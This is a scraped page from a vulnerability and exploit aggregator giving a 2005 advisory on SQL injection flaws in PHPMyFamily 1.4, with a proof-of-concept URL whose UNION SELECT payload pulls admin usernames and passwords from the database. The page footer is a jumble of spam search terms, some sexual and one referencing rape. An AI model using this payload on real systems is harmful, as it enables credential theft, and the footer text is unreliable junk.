about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPMyFamily Multiple SQL Injection Vulnerabilities


Title PHPMyFamily Multiple SQL Injection Vulnerabilities
Published 2005-03-21-12:00AM
Updated 2005-03-21-05:32PM
Class Input Validation Error
CVE   CAN-2005-0841
Remote  Yes
Local  No
Credit  Discovery of this vulnerability is credited to kreon <kre0n@mail.ru>.
Vulnerable  phpmyfamily phpmyfamily 1.4
Not Vulnerable  
Code   No exploit is required.

The following proof of concept is available:
http://www.example.com/[myphpfamily]/people.php?person=00002'%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WHERE%20admin='Y'%20LIMIT%201,1/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 06:20:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
shop348211 /search/ex IBP 2..7 Www.Xnxx.C amisha pat bbs.1010px sparc www.wangru www.south. INDIAN SEX rape vedio yahoo.com. www.lierm. GET /galle phpnuke 2. umiko lee bbs.1010px My_eGaller www.lierm. news.php sexarab sexxxx vid telugu sex www.1010px components XLXX. Com news for c Intel Indiansex. PHP Advanc www.1010px america windows 98 www.lsfz.n Indiansex. xnxx 89 co minhas 200 /compo 200 /compo rayan maxcpm.inf Apache h WWW.SEXYWO 3325 dhoom top qmail pop3 root 0day 200 /compo news for c dhoom top